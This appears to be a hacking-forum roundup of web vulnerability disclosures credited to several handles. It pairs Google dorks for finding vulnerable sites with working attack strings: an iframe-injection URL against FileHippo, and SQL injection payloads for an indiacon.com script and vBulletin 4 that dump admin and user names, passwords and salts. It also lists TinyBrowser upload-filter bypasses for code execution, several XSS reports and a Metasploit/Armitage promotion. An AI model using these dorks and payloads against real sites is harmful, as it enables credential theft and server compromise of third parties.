Popular Freeware Software download website "FileHippo" is Vulnerable to Iframe Injection.

Vulnerable Link
http://www.filehippo.com/search?q=%22%3E%3Ciframe%20src=http://www.google.com%20height=500%20width=500%3E

by n3t phir3

Source
ICQ 7.5 client
http://noptrix.net/advisories/icq_cli_xss.txt
icq.com webpage
http://noptrix.net/advisories/icq_web_xss.txt

by Kayan

Dork : inurl:selloffers.php?cid= "Powered by indiacon.com"

Exploite:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin

by
Ehsan_Hp200

Google Dork: intitle: powered by Vbulletin 4

Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

by FB1H2S

Download link:
http://wordpress.org/extend/plugins/wp-e-commerce
Google Dork:
inurl:page_id= "Your billing/contact details"

Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE
`id` = '$value_id' LIMIT 1?;
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX:
Upgrade to new version

-------------------------
Affected products:
-------------------------

Vulnerable are TinyBrowser v1.42 and previous versions (and all web
applications which are using it, such as TinyMCE). Developer fixed these
holes in the next version 1.43 already in February, after my informing, but
this version still was not released. So contact developer for new version.

----------
Details:
----------

Code Execution (WASC-31):

Execution of arbitrary code is possible due to bypass of program's security
filters (on web servers IIS and Apache).

Code will execute via file uploading. Program is vulnerable to three methods
of code execution:

1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).

2. Via "1.asp" in folder name (IIS).

3. Via double extension (1.php.txt) (Apache with special configuration).


by
MustLive

4shared.com does not filter their filename input which allows us to inject HTML code into the filename variable, being shown on the “Upload succes” page. This page is (by going to the page’s URL) viewable for other people as well. I’m not sure how long this page remains visible.

This kind of XSS probably works at a lot more upload services (as proven below)!

Source
http://pastebin.com/Yx8qihha

Source
http://translate.googleusercontent.com/translate_c?hl=en&rurl=translate.google.com&sl=uk&tl=en&u=http://websecurity.com.ua/xss_generator/&usg=ALkJrhh699gbDJD7X7rSoHNSC4_gIbxn6Q

“Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.“

Download
http://www.fastandeasyhacking.com/download

Metasploit
http://securityxploit.blogger.de/stories/1846661/

Skype suffers from a persistent Cross-Site Scripting vulnerability due to a lack
of input validation and output sanitization of the "mobile phone" profile entry.
Other input fields may also be affected.

Source
http://www.noptrix.net/advisories/skype_xss.txt